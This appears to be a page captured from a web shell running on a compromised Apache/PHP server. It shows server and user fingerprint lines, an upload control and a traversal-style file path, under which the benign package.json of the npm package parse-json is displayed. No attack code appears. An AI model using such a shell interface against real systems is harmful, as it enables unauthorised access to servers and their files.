( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/html/tmpr/../tmpr/..//tmpr/../tmpr/..//node_modules/parse-json/package.json
{
	"name": "parse-json",
	"version": "5.2.0",
	"description": "Parse JSON with more helpful errors",
	"license": "MIT",
	"repository": "sindresorhus/parse-json",
	"funding": "https://github.com/sponsors/sindresorhus",
	"author": {
		"name": "Sindre Sorhus",
		"email": "sindresorhus@gmail.com",
		"url": "https://sindresorhus.com"
	},
	"engines": {
		"node": ">=8"
	},
	"scripts": {
		"test": "xo && nyc ava"
	},
	"files": [
		"index.js",
		"vendor"
	],
	"keywords": [
		"parse",
		"json",
		"graceful",
		"error",
		"message",
		"humanize",
		"friendly",
		"helpful",
		"string"
	],
	"dependencies": {
		"@babel/code-frame": "^7.0.0",
		"error-ex": "^1.3.1",
		"json-parse-even-better-errors": "^2.3.0",
		"lines-and-columns": "^1.1.6"
	},
	"devDependencies": {
		"ava": "^1.4.1",
		"nyc": "^14.1.1",
		"xo": "^0.24.0"
	}
}